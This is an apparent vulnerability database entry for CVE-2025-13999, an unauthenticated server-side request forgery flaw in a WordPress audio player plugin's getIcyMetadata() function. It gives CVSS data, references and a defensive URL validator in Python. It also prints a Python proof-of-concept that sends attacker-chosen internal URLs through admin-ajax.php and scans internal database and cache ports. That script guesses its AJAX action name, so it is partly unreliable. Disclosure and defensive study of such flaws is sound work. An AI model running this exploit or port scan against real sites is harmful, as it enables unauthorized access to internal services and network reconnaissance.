Security Vulnerability Report
CVE-2025-13999 CVSS 7.2 HIGH

CVE-2025-13999

Published: 2025-12-19 07:16:01
Last Modified: 2026-04-15 00:35:42

Description

The HTML5 Audio Player – The Ultimate No-Code Podcast, MP3 & Audio Player plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions from 2.4.0 up to, and including, 2.5.1 via the getIcyMetadata() function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.
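The defensive counterpart to the flaw described above, as an added example that is not the plugin's own code: a Python validator that a metadata fetcher such as getIcyMetadata() would run on a user-supplied stream URL before issuing the request, rejecting non-http(s) schemes and any host that resolves to a loopback, private, link-local or otherwise non-public address. FAKE_DNS, resolve_fake, is_public_ip and validate_stream_url are names chosen for this example, and every hostname and address in it is constructed.

```python
import ipaddress
from urllib.parse import urlparse

# Constructed stand-in for DNS (hostname -> A/AAAA records) so the example runs
# offline; real code would use socket.getaddrinfo(). All values are made up.
FAKE_DNS = {
    "stream.example.com": ["23.45.67.89"],              # public only
    "rebind.example.net": ["23.45.67.89", "10.0.0.5"],  # mixed: one private record
    "localtest.example.org": ["127.0.0.1"],             # name pointing at loopback
}

def resolve_fake(host):
    return FAKE_DNS.get(host, [])

def is_public_ip(ip_str):
    """True only for globally routable unicast addresses; rejects loopback,
    RFC 1918, link-local, IPv4-mapped IPv6, multicast and reserved ranges."""
    ip = ipaddress.ip_address(ip_str)
    return ip.is_global and not ip.is_multicast

def validate_stream_url(url, resolver=resolve_fake):
    """Return (ok, reason, pinned_ip). The caller must connect to pinned_ip
    (sending the original Host header) and re-run this check on every redirect;
    otherwise a DNS answer that changes between check and fetch bypasses it."""
    parts = urlparse(url)
    if parts.scheme.lower() not in ("http", "https"):
        return False, "scheme not allowed", None   # no file://, gopher://, ...
    if not parts.hostname:
        return False, "missing host", None
    if parts.username or parts.password:
        return False, "credentials in URL", None
    try:
        # Literal address: validate it directly, no DNS involved.
        addrs = [str(ipaddress.ip_address(parts.hostname))]
    except ValueError:
        # Hostname (or an odd encoding such as 0x7f000001 that only the OS
        # resolver understands): judge the addresses it resolves to, never
        # the string form.
        addrs = resolver(parts.hostname)
    if not addrs:
        return False, "host does not resolve", None
    for addr in addrs:
        if not is_public_ip(addr):
            return False, f"resolves to non-public address {addr}", None
    return True, "ok", addrs[0]
```

Restricting the destination port to the ports a public stream is expected to use is a further, deployment-specific tightening the check above does not make.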

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

HTML5 Audio Player plugin >= 2.4.0 and <= 2.5.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13999 SSRF PoC for WordPress HTML5 Audio Player Plugin
# Affected versions: 2.4.0 to 2.5.1
# This PoC demonstrates the SSRF vulnerability in getIcyMetadata() function

import requests
import sys

def exploit_ssrf(target_url, internal_target):
    """
    Exploit SSRF vulnerability to make server request to internal resources

    Args:
        target_url: Target WordPress site URL
        internal_target: Internal resource to target (e.g., http://localhost, http://127.0.0.1)
    """
    # The vulnerable endpoint is typically in the AJAX handler
    vulnerable_endpoint = f"{target_url}/wp-admin/admin-ajax.php"

    # Construct the malicious request that triggers getIcyMetadata()
    # The function processes user-supplied URL without proper validation
    payload = {
        'action': 'get_icy_metadata',   # or similar AJAX action
        'stream_url': internal_target,  # attacker-controlled URL
        'nonce': ''                     # may not be required for unauthenticated exploitation
    }

    try:
        print(f"[*] Sending SSRF payload to: {target_url}")
        print(f"[*] Targeting internal resource: {internal_target}")
        response = requests.post(vulnerable_endpoint, data=payload, timeout=10)
        print(f"[+] Response Status: {response.status_code}")
        print(f"[+] Response Body: {response.text[:500]}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None

def scan_internal_services(target_url, internal_ip_range):
    """
    Use SSRF to scan internal network services
    """
    print(f"[*] Scanning internal network: {internal_ip_range}")
    common_ports = [80, 443, 8080, 3306, 5432, 6379, 27017]
    for port in common_ports:
        target = f"http://{internal_ip_range}:{port}"
        result = exploit_ssrf(target_url, target)
        if result and result.status_code != 0:
            print(f"[+] Service detected at port {port}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-13999.py <target_url> <internal_target>")
        print("Example: python cve-2025-13999.py http://example.com http://localhost:8080")
        sys.exit(1)
    target = sys.argv[1]
    internal = sys.argv[2]
    exploit_ssrf(target, internal)

References

https://plugins.trac.wordpress.org/changeset?old=3394789&old_path=html5-audio-player%2Ftags%2F2.5.1%2Finc%2FCore%2FAjax.php&new=3419843&new_path=html5-audio-player%2Ftags%2F2.5.2%2Finc%2FCore%2FAjax.php (plugin changeset: diff of inc/Core/Ajax.php between tags 2.5.1 and 2.5.2)
https://www.wordfence.com/threat-intel/vulnerabilities/id/989b4b9d-e22e-46a7-8ebc-5c8b33f98111?source=cve (Wordfence advisory)

Record Details

Weakness: CWE-918 (Server-Side Request Forgery)
Record status: Deferred
CVSS v3.1 exploitability score: 3.9
CVSS v3.1 impact score: 2.7